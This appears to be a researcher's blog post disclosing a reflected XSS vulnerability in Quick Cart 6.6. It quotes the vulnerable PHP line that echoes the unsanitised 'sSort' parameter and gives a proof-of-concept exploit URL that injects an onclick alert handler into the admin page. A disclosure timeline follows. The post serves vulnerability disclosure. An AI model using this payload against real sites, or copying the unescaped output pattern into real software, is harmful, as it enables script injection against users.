Quick Cart v 6.6 XSS Vulnerability

## FULL DISCLOSURE

#Product    : Quick Cart
#Exploit Author  : Rahul Pratap Singh
#Version    : 6.6
#Home page Link  : http://opensolution.org/home.html
#Website  : 0x62626262.wordpress.com
#Linkedin  : https://in.linkedin.com/in/rahulpratapsingh94
#Date        : 19/Jan/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-

 “sSort” parameter is not sanitized that leads to Reflected XSS.

—————————————-
Vulnerable Code:
—————————————-

File Name: products.php

Found at line:26
<?php if( isset( $sSort ) ) echo ‘<input type=”hidden” name=”sSort” value=”‘.$sSort.'” />’; ?>

—————————————-
Exploit:
—————————————-
localhost/Quick.Cart_v6.6/admin.php?p=pages-list&sSort=”%20onclick=”alert(1)&sPhrase=

—————————————-
POC:
—————————————-

Quick.Cartv6.6xsspoc

Disclosure Timeline:
Tried to contact vendor via email  : 14/1/2016 ( email bounce back)
Tried to contact vendor via forum : 18/1/2016 (thread deleted, no response)

Public Disclosure: 19/1/2016

Updated:
Got to know about Multiple XSS Vulnerability in Quick Cart.
Source: https://blog.curesec.com/article/blog/QuickCart-66-Multiple-XSS-74.html

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s